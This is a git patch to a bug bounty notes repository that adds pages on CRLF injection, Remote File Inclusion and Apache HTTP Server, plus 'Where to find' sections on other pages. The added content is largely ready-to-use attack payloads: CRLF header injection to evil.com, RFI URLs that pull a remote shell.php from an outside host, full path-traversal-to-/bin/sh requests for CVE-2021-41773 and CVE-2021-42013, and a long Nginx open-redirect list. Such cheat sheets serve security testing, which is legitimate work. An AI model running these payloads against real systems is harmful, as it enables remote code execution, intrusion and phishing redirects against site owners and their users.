From abd025fb643e97d23d2d3bee997fc7f634522a4d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Wed, 22 Jun 2022 11:41:21 +0700 Subject: [PATCH] Add 'Where to find' in each readme, add Apache + CRLF + RFI --- Arbitrary File Upload.md | 12 ++++++-- Business Logic Errors.md | 5 +++- Bypass/Bypass Captcha.md | 2 +- CRLF Injection.md | 35 +++++++++++++++++++++++ Cross Site Request Forgery.md | 8 +++++- Cross Site Scripting.md | 5 +++- Denial Of Service.md | 5 +++- Exposed Source Code.md | 5 +++- Host Header Injection.md | 3 ++ Insecure Direct Object References.md | 6 +++- Local File Inclusion.md | 5 +++- OAuth Misconfiguration.md | 5 +++- Open Redirect.md | 6 +++- README.md | 5 +++- Remote File Inclusion.md | 31 ++++++++++++++++++++ Technologies/Apache HTTP Server.md | 42 ++++++++++++++++++++++++++++ Technologies/Confluence.md | 4 +-- Technologies/HAProxy.md | 2 +- Technologies/Jira.md | 5 +--- Technologies/Nginx.md | 38 +++++++++++++++++++++++-- Technologies/Zend.md | 2 +- Web Cache Poisoning.md | 5 +++- 22 files changed, 211 insertions(+), 25 deletions(-) create mode 100644 CRLF Injection.md create mode 100644 Remote File Inclusion.md create mode 100644 Technologies/Apache HTTP Server.md diff --git a/Arbitrary File Upload.md b/Arbitrary File Upload.md index 57f6bd3..8d247dc 100644 --- a/Arbitrary File Upload.md +++ b/Arbitrary File Upload.md @@ -1,5 +1,13 @@ -# Bypass File Upload -1. Change the ContentType +# Arbitrary File Upload + +## Introduction +An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server. + +## Where to find +In upload file feature, for example upload photo profile feature + +## How to exploit +1. Change the `Content-Type` value ``` POST /images/upload/ HTTP/1.1 Host: target.com diff --git a/Business Logic Errors.md b/Business Logic Errors.md index 9249590..72d8784 100644 --- a/Business Logic Errors.md +++ b/Business Logic Errors.md @@ -3,7 +3,10 @@ ## Introduction Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. -## How to find +## Where to find +This vulnerability can appear in all features of the application. + +## How to exploit 1. Review Functionality - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. diff --git a/Bypass/Bypass Captcha.md b/Bypass/Bypass Captcha.md index 29ed221..e2dbfc3 100644 --- a/Bypass/Bypass Captcha.md +++ b/Bypass/Bypass Captcha.md @@ -1,4 +1,4 @@ -# Bypass Captcha +# Bypass Captcha (Google reCAPTCHA) 1. Try changing the request method, for example POST to GET ``` diff --git a/CRLF Injection.md b/CRLF Injection.md new file mode 100644 index 0000000..ba63281 --- /dev/null +++ b/CRLF Injection.md @@ -0,0 +1,35 @@ +# CRLF Injection + +## Introduction +A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. + +## Where to find +It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308). + +## How to exploit +1. Basic payload +``` +https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/ +``` +The response is +``` +HTTP/1.1 200 OK +Content-Type: text/html +Date: Mon, 09 May 2016 14:47:29 GMT +Set-Cookie: language=en +Location: https://evil.com/ +``` + +2. Double encode +``` +https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/ +``` + +3. Bypass unicode +``` +https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/ +``` + +## References +* [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/) +* [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md) \ No newline at end of file diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index 5726e5e..dd458c4 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -3,6 +3,9 @@ ## Introduction Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated +## How to find +Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) + ## How to exploit 1. HTML GET Method @@ -37,4 +40,7 @@ xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xhr.send('{"role":admin}'); -``` \ No newline at end of file +``` + +5. Multipart request +Soon \ No newline at end of file diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 8005eb4..cbccd0d 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -12,7 +12,10 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s A type of XSS that has payloads found in the DOM rather than within the HTML code. -## **How to exploit** +## Where to find +This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code. + +## How to exploit 1. Basic payload ```html diff --git a/Denial Of Service.md b/Denial Of Service.md index c75adda..1b87ad6 100644 --- a/Denial Of Service.md +++ b/Denial Of Service.md @@ -2,8 +2,11 @@ ## Introduction Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it -## How to FInd +## Where to find +This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files + +## How to exploit 1. Cookie bomb ``` diff --git a/Exposed Source Code.md b/Exposed Source Code.md index 2360b4c..a5d0932 100644 --- a/Exposed Source Code.md +++ b/Exposed Source Code.md @@ -3,7 +3,10 @@ ## Introduction Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. -## How to FInd +## Where to find +`-` + +## How to exploit 1. Exposed Git folder ``` https://site.com/.git diff --git a/Host Header Injection.md b/Host Header Injection.md index d224674..cd7d4b6 100644 --- a/Host Header Injection.md +++ b/Host Header Injection.md @@ -3,6 +3,9 @@ ## Introduction HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. +## Where to find +In the feature where the website can send email to us. For example forgot password / newsletter. + ## How to exploit 1. Change the host header ``` diff --git a/Insecure Direct Object References.md b/Insecure Direct Object References.md index 8e4b3ca..46bdd1a 100644 --- a/Insecure Direct Object References.md +++ b/Insecure Direct Object References.md @@ -3,7 +3,11 @@ ## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. -## How to FInd +## Where to find +- Usually it can be found in APIs. +- Check the HTTP request that contain unique ID, for example `user_id` or `id` + +## How to exploit 1. Add parameters onto the endpoints for example, if there was ``` GET /api/v1/getuser diff --git a/Local File Inclusion.md b/Local File Inclusion.md index 86287bb..dd1c239 100644 --- a/Local File Inclusion.md +++ b/Local File Inclusion.md @@ -1,8 +1,11 @@ -## Local File Inclusion +## Local File Inclusion (LFI) ## Introduction Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server +## Where to find +- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` + ## How to exploit 1. Basic payload ``` diff --git a/OAuth Misconfiguration.md b/OAuth Misconfiguration.md index 8655650..bb50ba4 100644 --- a/OAuth Misconfiguration.md +++ b/OAuth Misconfiguration.md @@ -3,7 +3,10 @@ ## Introduction The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. -## How to find +## Where to find +In the SSO feature. For example `Log in with google` or `Log in with facebook`. + +## How to exploit 1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses). 2. Change Referral header to attacker.com while requesting OAuth. 3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. diff --git a/Open Redirect.md b/Open Redirect.md index 621fce3..0493ca7 100644 --- a/Open Redirect.md +++ b/Open Redirect.md @@ -3,7 +3,11 @@ ## Introduction Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain -## How to Find +## Where to find +- Sometimes it can be found in login / register / logout pages +- Checking the javascript source code + +## How to exploit 1. Try change the domain ``` /?redir=evil.com diff --git a/README.md b/README.md index 1c6bafe..2d4d248 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ## List - [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) +- [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) - [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) @@ -17,9 +18,10 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) -- SQL Injection (SOON) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) +- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md) +- SQL Injection (SOON) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) ## List Bypass @@ -41,6 +43,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) ## Technologies +- [Apache (HTTP Server)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Apache%20HTTP%20Server.md) - [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md) - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) diff --git a/Remote File Inclusion.md b/Remote File Inclusion.md new file mode 100644 index 0000000..9a5aad0 --- /dev/null +++ b/Remote File Inclusion.md @@ -0,0 +1,31 @@ +## Remote File Inclusion (RFI) + +## Introduction +Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. + +## Where to find +- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` + +## How to exploit +1. Basic payload +``` +http://example.com/index.php?page=http://daffa.info/shell.php +``` + +2. URL encoding +``` +http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php +``` + +3. Double encoding +``` +http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php +``` + +4. Using Null Byte (%00) +``` +http://example.com/index.php?page=http://daffa.info/shell.php%00 +``` + +## References +* [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list) \ No newline at end of file diff --git a/Technologies/Apache HTTP Server.md b/Technologies/Apache HTTP Server.md new file mode 100644 index 0000000..0bd98ed --- /dev/null +++ b/Technologies/Apache HTTP Server.md @@ -0,0 +1,42 @@ +# Apache (HTTP Server) Common Bugs + +## Introduction +What would you do if you came across a website that uses Apache (HTTP Server)? + +## How to Detect +Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page + +1. Find the related CVE by checking Apache (HTTP Server) version +* How to find the Apache (HTTP Server) version + +By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html) + +Some example CVE: + +- CVE-2021-41773 (RCE and LFI) +``` +POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: */* +Content-Length: 7 +Content-Type: application/x-www-form-urlencoded +Connection: close + +echo;id +``` +- CVE-2021-42013 (RCE and LFI) +``` +POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 7 + +echo;id +``` \ No newline at end of file diff --git a/Technologies/Confluence.md b/Technologies/Confluence.md index 23033c6..9aeac04 100644 --- a/Technologies/Confluence.md +++ b/Technologies/Confluence.md @@ -4,9 +4,7 @@ What would you do if you came across a website that uses Confluence? ## How to Detect -``` -https://example.com/login.action?os_destination=%2F -``` +Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login 1. Find the related CVE by checking Confluence version * How to find the Confluence version diff --git a/Technologies/HAProxy.md b/Technologies/HAProxy.md index 3471bd6..041dc56 100644 --- a/Technologies/HAProxy.md +++ b/Technologies/HAProxy.md @@ -4,7 +4,7 @@ What would you do if you came across a website that uses HAProxy? ## How to Detect -- +`-` 1. CVE-2021-40346 (HTTP Request Smuggling) ``` diff --git a/Technologies/Jira.md b/Technologies/Jira.md index e6b19fb..6c3cc0e 100644 --- a/Technologies/Jira.md +++ b/Technologies/Jira.md @@ -4,10 +4,7 @@ What would you do if you came across a website that uses Jira? ## How to Detect -``` -https://example.com/secure/Dashboard.jspa -https://example.com/login.jsp -``` +Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login 1. Find the related CVE by checking jira version * How to find the jira version diff --git a/Technologies/Nginx.md b/Technologies/Nginx.md index 93d0fdc..129ed21 100644 --- a/Technologies/Nginx.md +++ b/Technologies/Nginx.md @@ -21,7 +21,41 @@ https://example.com/folder1/folder2/static../static/main.css https://example.com/folder1/folder2/static../%s/main.css ``` -3. Nginx status page +3. Open redirect +This is because of misconfiguration +``` +https://example.com/%5cevil.com +https://example.com////\;@evil.com +https://example.com////evil.com +https://example.com///evil.com +https://example.com///evil.com/%2f%2e%2e +https://example.com///evil.com@// +https://example.com///{{RootURL}}evil.com/%2f%2e%2e +https://example.com//;@evil.com +https://example.com//\/evil.com/ +https://example.com//\@evil.com +https://example.com//\evil.com +https://example.com//\tevil.com/ +https://example.com//evil.com/%2F.. +https://example.com//evil.com// +https://example.com//evil.com@// +https://example.com//evil.com\tevil.com/ +https://example.com//https://evil.com@// +https://example.com/<>//evil.com +https://example.com/\/\/evil.com/ +https://example.com/\/evil.com +https://example.com/\evil.com +https://example.com/evil.com +https://example.com/evil.com/%2F.. +https://example.com/evil.com/ +https://example.com/evil.com/..;/css +https://example.com/https:evil.com +``` + +4. Nginx status page ``` https://example.com/nginx_status -``` \ No newline at end of file +``` + +## References +- [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) \ No newline at end of file diff --git a/Technologies/Zend.md b/Technologies/Zend.md index 048dbe8..03ea8d3 100644 --- a/Technologies/Zend.md +++ b/Technologies/Zend.md @@ -4,7 +4,7 @@ What would you do if you came across a website that uses Zend? ## How to Detect -- +`-` 1. Finding config files ``` diff --git a/Web Cache Poisoning.md b/Web Cache Poisoning.md index da1ba97..16bb39c 100644 --- a/Web Cache Poisoning.md +++ b/Web Cache Poisoning.md @@ -3,7 +3,10 @@ ## Introduction The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. -## How to FInd +## Where to find +`-` + +## How to exploit 1. Basic poisoning ``` GET / HTTP/1.1